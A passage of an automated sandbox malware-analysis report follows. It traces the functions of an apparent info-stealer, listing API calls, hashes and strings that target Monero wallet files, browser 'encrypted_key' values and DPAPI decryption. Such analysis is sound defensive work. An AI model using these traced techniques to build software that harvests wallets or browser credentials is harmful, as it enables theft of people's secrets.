                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesswsprintf
                    • String ID: %hs
                    • API String ID: 769748085-2783943728
                    • Opcode ID: fc83579afd650395a9fb4c61514eb37a0cd958cf7ca8f727f7e631f493bd7119
                    • Instruction ID: ccea7aa55ce3cb09e8179603611bb8db6633483aa9e94c746679280407e500bf
                    • Opcode Fuzzy Hash: fc83579afd650395a9fb4c61514eb37a0cd958cf7ca8f727f7e631f493bd7119
                    • Instruction Fuzzy Hash: EEE0ECB5A40208FBD710DBD4DE4AE6977B8EB44702F004195FD0997380DE759E109B96
                    Function 0095A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 00968B60: GetSystemTime.KERNEL32(00970E1A,005BA900,009705AE,?,?,009513F9,?,0000001A,00970E1A,00000000,?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 00968B86
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095A2E1
                    • lstrlen.KERNEL32(00000000,00000000), ref: 0095A3FF
                    • lstrlen.KERNEL32(00000000), ref: 0095A6BC
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                    • DeleteFileA.KERNEL32(00000000), ref: 0095A743
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 4eb30413ca134df3c70cc2e45af021c650ca27135bca0b504e0fe7c52940af29
                    • Instruction ID: 6ea0305beac90527e0c055ae414a6d15cb3cf87ac6d57b85a723c6c371c1cf9b
                    • Opcode Fuzzy Hash: 4eb30413ca134df3c70cc2e45af021c650ca27135bca0b504e0fe7c52940af29
                    • Instruction Fuzzy Hash: B9E1AB728101189ADB09FBA4DD96FEE7338AF94300F508169F516770A1EF346A4DCFA6
                    Function 0095D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 00968B60: GetSystemTime.KERNEL32(00970E1A,005BA900,009705AE,?,?,009513F9,?,0000001A,00970E1A,00000000,?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 00968B86
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095D481
                    • lstrlen.KERNEL32(00000000), ref: 0095D698
                    • lstrlen.KERNEL32(00000000), ref: 0095D6AC
                    • DeleteFileA.KERNEL32(00000000), ref: 0095D72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 095a21f993c07c5238fb2cd2a9119ebd628bb61b17fbaa105035872dbe54e639
                    • Instruction ID: e365616e049718ee4620921fce0ec1f8c1ff95d11f8701f92161d4abb0ae6d08
                    • Opcode Fuzzy Hash: 095a21f993c07c5238fb2cd2a9119ebd628bb61b17fbaa105035872dbe54e639
                    • Instruction Fuzzy Hash: DE91CC729101089BDB04FBA4DD96FEE7339AF94300F508169F516B70A1EF346A49CFA6
                    Function 0095D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 00968B60: GetSystemTime.KERNEL32(00970E1A,005BA900,009705AE,?,?,009513F9,?,0000001A,00970E1A,00000000,?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 00968B86
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095D801
                    • lstrlen.KERNEL32(00000000), ref: 0095D99F
                    • lstrlen.KERNEL32(00000000), ref: 0095D9B3
                    • DeleteFileA.KERNEL32(00000000), ref: 0095DA32
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 2e123ef48713bb1f7198de0846eb6abd027beac219f1ea75100d08374db3352f
                    • Instruction ID: 979c365a6973ab0e403dae73016821a7d92c7537f954377b52776647991416d4
                    • Opcode Fuzzy Hash: 2e123ef48713bb1f7198de0846eb6abd027beac219f1ea75100d08374db3352f
                    • Instruction Fuzzy Hash: BA81BA729101089BDB08FBA4DD96FEE7339AF94300F504569F506B71A1EF346A09CFA6
                    Function 0095F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                      • Part of subcall function 009599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                      • Part of subcall function 009599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                      • Part of subcall function 009599C0: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                      • Part of subcall function 009599C0: LocalFree.KERNEL32(0095148F), ref: 00959A90
                      • Part of subcall function 009599C0: CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                      • Part of subcall function 00968E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00968E52
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00971580,00970D92), ref: 0095F54C
                    • lstrlen.KERNEL32(00000000), ref: 0095F56B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                    • String ID: ^userContextId=4294967295$moz-extension+++
                    • API String ID: 998311485-3310892237
                    • Opcode ID: 4d7f78b42761aa6c9691e49b57f6e25912997402fa00e31f3be10b838ee4d548
                    • Instruction ID: af47bb65e728e50f9ee4643bba68880bbcb22a25f6e22fd7e5019793a2d388e0
                    • Opcode Fuzzy Hash: 4d7f78b42761aa6c9691e49b57f6e25912997402fa00e31f3be10b838ee4d548
                    • Instruction Fuzzy Hash: 65510E72D10108AADB04FFA4DC96EEE7378AFD4340F508529F91677191EE346A09CFA6
                    Function 00963560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen
                    • String ID:
                    • API String ID: 367037083-0
                    • Opcode ID: 68d3786efab0c1806f5feadb3f9fcbe910c08a196b32e5e950a6905beab6334d
                    • Instruction ID: 8ebad07793ff7e4e8819da980ecaf85d8a19fdbd596244a291b634e525ee7cc7
                    • Opcode Fuzzy Hash: 68d3786efab0c1806f5feadb3f9fcbe910c08a196b32e5e950a6905beab6334d
                    • Instruction Fuzzy Hash: AE413DB1D10109EBCB04EFA4D896AEEB778EF94304F00C419E41677291EB75AA05CFA2
                    Function 00959CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 009599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                      • Part of subcall function 009599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                      • Part of subcall function 009599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                      • Part of subcall function 009599C0: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                      • Part of subcall function 009599C0: LocalFree.KERNEL32(0095148F), ref: 00959A90
                      • Part of subcall function 009599C0: CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                      • Part of subcall function 00968E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00968E52
                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00959D39
                      • Part of subcall function 00959AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959AEF
                      • Part of subcall function 00959AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00954EEE,00000000,?), ref: 00959B01
                      • Part of subcall function 00959AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959B2A
                      • Part of subcall function 00959AC0: LocalFree.KERNEL32(?,?,?,?,00954EEE,00000000,?), ref: 00959B3F
                      • Part of subcall function 00959B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00959B84
                      • Part of subcall function 00959B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00959BA3
                      • Part of subcall function 00959B60: LocalFree.KERNEL32(?), ref: 00959BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                    • String ID: $"encrypted_key":"$DPAPI
                    • API String ID: 2100535398-738592651
                    • Opcode ID: a683785744caff4a054845aa20987cafeec2bd1fc9226ec084573063a139413b
                    • Instruction ID: dbbe3c1c106beb746a5cb8ac749f477a655834e1eeb4d5d5769c5b0afb98eb7d
                    • Opcode Fuzzy Hash: a683785744caff4a054845aa20987cafeec2bd1fc9226ec084573063a139413b
                    • Instruction Fuzzy Hash: 1B3110B6D10109EBDF04DFE5DC85BEFB7B8AB88305F144519F915A7281EB349A08CBA1
                    Function 009692E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(00963AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00963AEE,?), ref: 009692FC
                    • GetFileSizeEx.KERNEL32(000000FF,00963AEE), ref: 00969319
                    • CloseHandle.KERNEL32(000000FF), ref: 00969327
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID:
                    • API String ID: 1378416451-0
                    • Opcode ID: 30e7eb40b0d6d2706548e64ea1b9995f617c5d9a42add928a94ce24c5808ec9b
                    • Instruction ID: 913777a2108ed9a1c1ff4afb67362dc642d8b4ffb21a831890bbb892d5cf9b12
                    • Opcode Fuzzy Hash: 30e7eb40b0d6d2706548e64ea1b9995f617c5d9a42add928a94ce24c5808ec9b
                    • Instruction Fuzzy Hash: 26F04935E40208BBDF10DFF0DD59F9E77BDAB48720F20C654BA51A72C0DA78AA018B80
                    Function 0096C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __getptd.LIBCMT ref: 0096C74E
                      • Part of subcall function 0096BF9F: __amsg_exit.LIBCMT ref: 0096BFAF
                    • __getptd.LIBCMT ref: 0096C765
                    • __amsg_exit.LIBCMT ref: 0096C773
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0096C797
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                    • String ID:
                    • API String ID: 300741435-0
                    • Opcode ID: bf846de6e3aef049daf7a909a4f31997af85558a1fe7117b24d2b486e9d9d533
                    • Instruction ID: cf8caf726488afad13b5eba5795d6bd178deeb72a3308b6dad838ebdcd299d5e
                    • Opcode Fuzzy Hash: bf846de6e3aef049daf7a909a4f31997af85558a1fe7117b24d2b486e9d9d533
                    • Instruction Fuzzy Hash: DDF0BEB29053019BD720BBB89807B6E33A06F80720F204149F598F62E2EF6459819F5A
                    Function 00964F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00968DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00968E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00964F7A
                    • lstrcat.KERNEL32(?,00971070), ref: 00964F97
                    • lstrcat.KERNEL32(?,005B9268), ref: 00964FAB
                    • lstrcat.KERNEL32(?,00971074), ref: 00964FBD
